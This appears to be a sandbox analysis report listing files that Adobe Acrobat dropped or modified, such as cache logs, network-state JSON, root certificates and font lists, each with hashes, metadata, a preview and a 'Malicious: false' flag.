SSDEEP:	6:7Z3+q2P92nKuAl9Ombzo2jMGIFUt8OA6Zmw+OAWVkwO92nKuAl9Ombzo2jMmLJ:7ZOv4HAa8uFUt8Ov/+O95LHAa8RJ
MD5:	BE5ACE2AE4A0B1F05BF3EED86A7B0138
SHA1:	CE730ED8255A68A2CB6197FC86D58C599CA43E17
SHA-256:	A415412A683374CD89BFB80FFE846AA40485CD1679B5A871A78C76A962911EBE
SHA-512:	D3B120945D01C36586D972CD66DADBFC60C3FCC8770A15E7F3B326C0C7EB6C340E9E86955CE4569C3F3D703FA057519F4EBEAEEC15F5352A97BD298CD6D03E27
Malicious:	false
Preview:	2024/12/10-03:48:04.620 1c48 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/10-03:48:04.622 1c48 Recovering log #3.2024/12/10-03:48:04.622 1c48 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.134650030658265
Encrypted:	false
SSDEEP:	6:7Z3+q2P92nKuAl9Ombzo2jMGIFUt8OA6Zmw+OAWVkwO92nKuAl9Ombzo2jMmLJ:7ZOv4HAa8uFUt8Ov/+O95LHAa8RJ
MD5:	BE5ACE2AE4A0B1F05BF3EED86A7B0138
SHA1:	CE730ED8255A68A2CB6197FC86D58C599CA43E17
SHA-256:	A415412A683374CD89BFB80FFE846AA40485CD1679B5A871A78C76A962911EBE
SHA-512:	D3B120945D01C36586D972CD66DADBFC60C3FCC8770A15E7F3B326C0C7EB6C340E9E86955CE4569C3F3D703FA057519F4EBEAEEC15F5352A97BD298CD6D03E27
Malicious:	false
Preview:	2024/12/10-03:48:04.620 1c48 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/10-03:48:04.622 1c48 Recovering log #3.2024/12/10-03:48:04.622 1c48 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0756ab74-a3be-443e-a593-13fe6c1b7019.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	508
Entropy (8bit):	5.061927262931336
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqg0sBdOg2HlZcaq3QYiubxnP7E4TfF+:Y2sRdsP5dMHlg3QYhbxP7np+
MD5:	62C90E53FB3D352C177B6103DE55F8C3
SHA1:	0362554DFFE3A212EDD8A50F201C26404E722BB6
SHA-256:	207BD19E6B23830DC351EA1F47BE54FFE89B1D150243CB54C1992646C65DE680
SHA-512:	E9753B7F923479920DD15A80CF761D0F40AD4421B42E3B63B612F80C99172CF241EDCEBD9EF37ADA468E7514D49711238FB4F19D850E510446645D03D524F571
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378380497100041","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":662236},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\9a8118b1-b229-4c53-8444-f00f17537fc6.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF674fff.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4099
Entropy (8bit):	5.236721316524279
Encrypted:	false
SSDEEP:	96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUZCrGUN+Ncc:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLo
MD5:	2BDF78E586FDE04D4780A0E25358058F
SHA1:	E48EC65BC4AE54296AA7BC5770582F090F359E89
SHA-256:	2D9EDAAEB95F248F8A93E3823B3D59C91881DDA25D108AD50118492D6D901624
SHA-512:	303FC037144CD50210FE6D77034C83A2D3729F007DD7AD417C429EDC1C2F2203FBBA96BD3BE36744A788140B33A21D5A1ABA40303D34B8CF92912D6D5DBCDA19
Malicious:	false
Preview:	*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.\|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.179893469926768
Encrypted:	false
SSDEEP:	6:7oHcV+q2P92nKuAl9OmbzNMxIFUt8Oo6Zmw+OokGHNVkwO92nKuAl9OmbzNMFLJ:7acgv4HAa8jFUt8Or/+O2T5LHAa84J
MD5:	D46A7FF04E2B2CA0E6873F43EBFC183E
SHA1:	28CB5504C8930DA90633F8C8990AEA57848EF6CC
SHA-256:	2BE829AD59A7E4EAF71E65379B9DE36872D568EF805842438F9D3FECBBF8AB27
SHA-512:	7137C650CED4E12235D5F825FD570FB02CDD1F40BF8E3C90ED187C8273C79EDA37B229FA7E2340111DAF4BCBD235D3CCF38FACE3ACD95BAAA52458EE8849D5BB
Malicious:	false
Preview:	2024/12/10-03:48:05.489 1c48 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/10-03:48:05.494 1c48 Recovering log #3.2024/12/10-03:48:05.523 1c48 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.179893469926768
Encrypted:	false
SSDEEP:	6:7oHcV+q2P92nKuAl9OmbzNMxIFUt8Oo6Zmw+OokGHNVkwO92nKuAl9OmbzNMFLJ:7acgv4HAa8jFUt8Or/+O2T5LHAa84J
MD5:	D46A7FF04E2B2CA0E6873F43EBFC183E
SHA1:	28CB5504C8930DA90633F8C8990AEA57848EF6CC
SHA-256:	2BE829AD59A7E4EAF71E65379B9DE36872D568EF805842438F9D3FECBBF8AB27
SHA-512:	7137C650CED4E12235D5F825FD570FB02CDD1F40BF8E3C90ED187C8273C79EDA37B229FA7E2340111DAF4BCBD235D3CCF38FACE3ACD95BAAA52458EE8849D5BB
Malicious:	false
Preview:	2024/12/10-03:48:05.489 1c48 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/10-03:48:05.494 1c48 Recovering log #3.2024/12/10-03:48:05.523 1c48 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7673182398396405
Encrypted:	false
SSDEEP:	3:kkFkl2WttfllXlE/HT8kOltNNX8RolJuRdxLlGB9lQRYwpDdt:kKvWteT8FNMa8RdWBwRd
MD5:	53F0611C27F632ED6E34E2B25ECB92AB
SHA1:	54A6EA6F204CE56D31E75287C1D111397E7C799C
SHA-256:	FAC54F6925F8A35B9F0736F4BD6432353C5E459D56E5181968BA26A84101BD92
SHA-512:	65B8C136B0D126CEF6B82CE8A4FC8C30729FCD2C2340EB92BA4D5A1489696E6027A7977D381D820CA6BBA912E38EA77C4BFE337BDDC843C4CD1271ABB43CE0E0
Malicious:	false
Preview:	p...... ........E.R@.J..(....................................................... ..........W....q\|..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.239498819991208
Encrypted:	false
SSDEEP:	6:kK3SFL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/SEDImsLNkPlE99SNxAhUe/3
MD5:	10571A91B6478F8C034A9406E707EACA
SHA1:	657B112CD61AC175F4CBE7D72896088D4BD2DB80
SHA-256:	DB906BD51C048C32191D2BF165C914D9375C683E06F2DEB5C9A472589FC60F9F
SHA-512:	37283621F1E1F59894B7FD5E9F427B1F0DC285CFD77ADD484B01C787702AD484C8AA368F594A9DEE384112E7C4B9D6E74FEEFBA1E4D46139B212DFA0489E728A
Malicious:	false
Preview:	p...... .........m>S.J..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7104

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7104

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
